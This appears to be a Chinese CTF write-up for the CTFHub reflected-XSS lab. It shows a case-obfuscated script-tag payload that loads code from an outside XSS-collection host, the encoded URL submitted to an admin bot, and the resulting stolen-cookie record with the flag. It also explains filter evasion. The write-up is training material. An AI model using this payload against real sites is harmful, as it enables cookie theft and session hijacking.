当前位置: 首页 > news >正文

深入解析:CTFHub XSS通关1:反射型

深入解析:CTFHub XSS通关1:反射型

目录

一、XSS平台

1、XSS平台简介

(1)前端界面

(2)后端服务

2、XSS平台使用

(1)注册账号

(2)登录账号

(3)创建项目

二、反射型渗透实战

1、XSS Reflect探测

2、Send URL to Bot

3、XSS平台渗透

(1)输入框1

(2)输入框2

三、源码分析

(1)功能一:用户输入与即时反馈

(2)功能二:攻击载荷交付平台

(3)效果三:框架状态提示器


本文详细讲解CTFHub的XSS-反射型关卡的渗透实战。本文介绍了XSS平台的功能及反射型XSS渗透实战。XSS平台由前端界面(管理面板、素材展示、Payload生成器)和后端服务(数据处理、Payload分发、会话管理)组成。实战部分演示了如何通过XSSReflect进行探测,利用SendURLtoBot模拟管理员访问,最终通过XSS平台窃取Cookie获取flag。关键步骤包括:验证风险、构造恶意URL、提交给Bot执行,在XSS平台查看窃取的Cookie信息(包含flag值)。整个过程展示了反射型XSS攻击的完整流程。

  • 造一个恶意链接:在名字框里输入盗取Cookie的代码,然后得到一个包含代码的恶意网址。

  • 把链接给“管理员”:把该恶意网址提交给“Send to Bot”。

  • “管理员”中招:Bot(管理员)会访问你给的链接,他浏览器里存的Cookie就会被你的代码偷走,并发送到你指定的地方。

  • 你拿到Cookie:用偷来的管理员Cookie,你就能冒充管理员,成功通关。

一、XSS平台

1、XSS平台简介

XSS平台是一种专门用于跨站脚本攻击测试和安全研究的Web应用程序。它为安全研究人员和白帽子黑客提供模拟真实攻击的环境,用于演示和验证Web应用程序中的XSS安全风险。平台核心功能包括生成并管理各种XSS攻击载荷(Payload)、自动收集受害者浏览器的敏感信息(如Cookie、会话令牌、浏览器指纹等),并提供远程代码执行能力。该平台强调合法与授权使用,通常用于渗透测试、安全教学等,是Web安全领域重要的教育和研究工具。其主要组成部分如下所示。

(1)前端界面

  • 攻击管理面板- 创建、监控攻击活动

  • 素材展示界面- 实时显示收集的信息

  • Payload生成器- 定制化攻击代码

(2)后端服务

  • 数据接收端点- 处理受害者发回的数据

  • Payload分发- 动态生成恶意脚本

  • 会话管理- 维持攻击者控制会话

2、XSS平台启用

(1)注册账号

本文以https://xssaq.com/为例,讲解如何在渗透测试场景下启用XSS平台。

(2)登录账号

使用注册的账号登录,如下所示。

我们会用到的效果。就是登录后效果如下所示,注意左侧菜单栏中的“创建项目”选项,这

(3)创建项目

点击左侧菜单栏中的“创建项目”,随便起个名字“mooyuan”,点击立即提交,如下所示。

在“我的的项目”点击刚才创建的任务“mooyuan”,再点击右上角的查看配置源码,如下图所示。

此时网页弹框如下所示,大家得在配置代码中选择自己要采用的脚本,这里我们选择第二个即可,如下所示(特定注意:每个人的payload各不相同)。

<sCRiPt sRC=//xs.pe/YxF></sCrIpT>

二、反射型渗透实战

1、XSS Reflect探测

打开靶场,在关卡页面中寻找所有可能的用户输入点,在第一个输入框内尝试输入最简单的测试载荷<script>alert("ljn")</script>,并观察页面响应。

<script>alert("ljn")</script>

如下所示浏览器成功弹窗,则确认该处存在XSS注入风险,此时XSS反射链接的URL地址如下所示。

http://challenge-7debcb7e143fdb9d.sandbox.ctfhub.com:10800/?name=%3Cscript%3Ealert%28%22ljn%22%29%3C%2Fscript%3E

2、Send URL to Bot

在CTF中,反射型XSS通常需要管理员触发。将上一步构造好的完整恶意URL提交给平台提供的“模拟管理员”或“机器人”进行访问,即复制XSS反射攻击URL到send URL to Bot对应的地址框中,如下所示。

点击send等价于让bot也执行这个XSS反射链接, 点击send后,就相当于让BOT执行我刚刚这个换浏览器访问XSS反射型攻击的链接一样。如下所示,执行成功,页面返回successfully。

这里我模拟一下执行效果,在本机换个浏览器,执行刚刚的反射URL地址,如下所示成功反弹。

3、XSS平台渗透

需要将Cookie外带到自己的服务器。这时候我们就需要一个接收并记录Cookie信息的XSS服务器,本部分部分我们使用XSS平台中的收集cookie特性,如下所示。就是接下来的目标是构造能窃取Cookie的有效载荷,由于最终目标是获取管理员Cookie,故而我们不能使用弹窗,而

<sCRiPt sRC=//xs.pe/YxF></sCrIpT>

  • 标签选择:没有使用常见的 <script>alert(1)</script>,而是选择了 <script src="...">。这指示浏览器从外部源(//xs.pe/YxF)加载并执行JavaScript代码。这样做的好处是载荷非常短,且攻击逻辑可能全部放在外部脚本中,便于维护和更新。

  • 大小写混淆:将 script 写成了 sCRiPt 和 sCrIpT。这是一种简单的绕过技术,用于规避那些只进行简单大小写匹配(如查找 <script)的初级WAF(Web应用防火墙)或输入过滤器。

  • 属性简化

    • sRC 而不是 src:同样是大小写混淆。

    • 属性值没有加引号:sRC=//xs.pe/YxF 而不是 src="//xs.pe/YxF"。这在HTML中是允许的,能减少特殊字符,有时也能绕过对引号的检查。

  • 协议相对URL:使用 //xs.pe/YxF 而不是 http://xs.pe/YxF 或 https://xs.pe/YxF。这意味着脚本会使用当前页面相同的协议(HTTP或HTTPS)来加载,兼容性更好,无论挑战页面是HTTP还是HTTPS都能成功加载恶意脚本。

(1)输入框1

输入基于XSS安全平台提供的payload,在第一个输入框输入后点击send,此时记录反射型攻击的XSS URL地址。

(2)输入框2

在第二个文本框内输入上一步生成的获取cookie的反射型XSS链接地址,点击send返回successfully。此步骤的目的是将构造好的完整恶意URL(窃取Cookie载荷)提交给平台提供的“模拟管理员”或“机器人”进行访问。一旦管理员浏览器加载此URL,其中的脚本就会自动执行,将其Cookie悄无声息地发送到你在上一步骤中搭建的接收服务器上。

观察XSS平台,如下说明服务器已收到cookie。

点击查看如下所示,找到管理员的Cookie即可成功获取到flag值。

其详细信息如下所示。

记录ID630922
首次触发时间2025-10-28 14:33:35
最后触发时间2025-10-28 14:33:35
触发者IP1.83.158.14
页面标题CTFHub 技能学习 | XSS Reflex
触发TOP_URLhttp://challenge-5f698b830967a013.sandbox.ctfhub.com:10800/?name=%3CsCRiPt+sRC%3D%2F%2Fxs.pe%2FYxF%3E%3C%2FsCrIpT%3E
触发URLhttp://challenge-5f698b830967a013.sandbox.ctfhub.com:10800/?name=%3CsCRiPt+sRC%3D%2F%2Fxs.pe%2FYxF%3E%3C%2FsCrIpT%3E
浏览器分辨率800*600
referrer
User AgentMozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/112.0.5615.138 Safari/537.36
Cookiesflag=ctfhub{e674ab26bf5696a534f87b62}
localStorage{}
sessionStorage{}

三、源码分析

源码展示了一个完整的、用于教学和挑战的反射型XSS注入的环境,其核心功能可能划分为三个相互关联的模块,共同模拟了一个真实的攻击场景。

1、能力一:用户输入与即时反馈

这是页面的核心交互功能。你在顶部的输入框里写下任何内容(比如你的名字),然后点击提交。页面会立即在下方生成一条问候语,例如“Hello, 你输入的内容”

关键点在于:它不仅仅是显示文字,而是将你的输入直接作为网页代码的一部分。如果你输入的是HTML或JavaScript代码,浏览器就会执行它。这就是风险所在。


2、功能二:攻击载荷交付平台

这个功能用于模拟真实攻击。你将一个完整的URL(包含恶意代码)填入这里的输入框,接着点击“Send”。

点击后,系统后台的一个“机器人”(Bot)——它扮演着网站管理员的角色——会自动去访问你提交的该URL。


3、功能三:系统状态提示器

这是一个简单的用户反馈系统。位于页面顶部的提示框,在你进行操作后(比如提交URL给Bot),它会告诉你操控结果是成功还是失败

  • 绿色提示框:代表成功,例如“网址已提交,Bot即将访问”。

  • 红色提示框:代表失败,并会告知你原因,例如“网址格式错误”。

这个功能让你能清晰地了解自己的执行状态,引导你进行下一步

CTFHub 技能学习 | XSS Reflex<script src="/static/jquery.min.js"></script><script src="/static/popper.min.js"></script><script src="/static/bootstrap.min.js"></script>

XSS Reflex


What's your name

Hello, <script src="//xs.pe/YxF"></script>


Send URL to Bot

URL
<script>function send() {let url = $("#url").val()$.ajax({type: "post",url: "/submit",dataType: "json",contentType: "application/json",data: JSON.stringify({url: url}),success: function (d) {if (d.code == -1) {$("#fail").text(d.msg)$("#fail").show();setTimeout(function () {$("#fail").hide();}, 5000);} else if (d.code == 0) {$("#success").text(d.msg)$("#success").show();setTimeout(function () {$("#success").hide();}, 5000);}}});}</script>

http://www.jsqmd.com/news/328647/

相关文章:

  • 【课程设计/毕业设计】基于springboot+bs架构的浙江艾艺塑业设计公司网站设计与实现【附源码、数据库、万字文档】
  • 2026年东莞口碑好的服务不错的吊装搬迁公司有哪些
  • 2026年商用清洁机器人品牌排名出炉,性价比高的Top10
  • 2026年东莞搬家公司推荐,大众搬家拆装家具要收费吗
  • 计算机Java毕设实战-基于Java Web的毕业设计选题管理系统的设计与实现基于SpringBoot+Vue的毕业设计选题管理系统【完整源码+LW+部署说明+演示视频,全bao一条龙等】
  • 讲讲充电桩安装专业组织哪家靠谱,用户评价来参考
  • 2026热点风暴:如何将黄金暴跌、NBA交易变测试实战指南?
  • 手机 App 跨平台框架统一目录构建
  • 2026年软件测试公众号热度解析与内容创作策略
  • 从零开始学虚拟化:高可用与灾备技术全解析(集群 + 备份 + 异地灾备)
  • 探寻口碑好的粮食烘干塔厂家,丰盛机械值得入手吗
  • 2026年软件测试公众号爆款内容解析:专业视角下的热度密码
  • 论文写不动?8个AI论文写作软件测评:本科生毕业论文+开题报告全攻略
  • ‌2026年软件测试公众号内容热度解析:专业视角下的趋势与策略
  • 导师严选9个降AI率工具 千笔AI帮你精准降AIGC
  • 2026必备!8个降AI率工具,千笔·专业降AI率智能体帮你解决AIGC检测难题
  • 白银价格飙升背后的测试链危机:光伏企业的极限压力测试
  • 2026支付网关跳转验证热点:测试从业者实战指南与优化策略
  • 2026年公众号热点内容趋势与软件测试专业应对
  • ‌2026年购物车删除项目手动测试:热点洞察与专业实践
  • 建议收藏|8个AI论文平台深度测评!专科生毕业论文+开题报告写作神器推荐
  • 2026年广东地区高性价比搬家公司排名,大众搬屋可信度高解析
  • 2025水墨印刷开槽机行业:实力公司排行一览,水墨印刷开槽机/电脑控制高速水墨印刷开槽机,水墨印刷开槽机生产厂家哪家好
  • 盘点2026年靠谱的建筑资质代办企业,天津广运达服务超贴心
  • 2026年房地产开发运营实力公司排名揭晓,云桥资管口碑出众
  • 2026钣金加工自动化:实力企业排行一览,排行前列的钣金加工综合实力与口碑权威评选
  • AIAAJ | 西工大张巧、张伟伟等:多专家特征融合网络架构预测跨声速抖振气动噪声
  • 短信提醒测试步骤在2026热点场景中的专业实践
  • 2026年软件测试从业者内容热度全景图
  • 详细介绍:从 ROS 订阅视频话题到本地可视化与 RTMP 推流全流程实战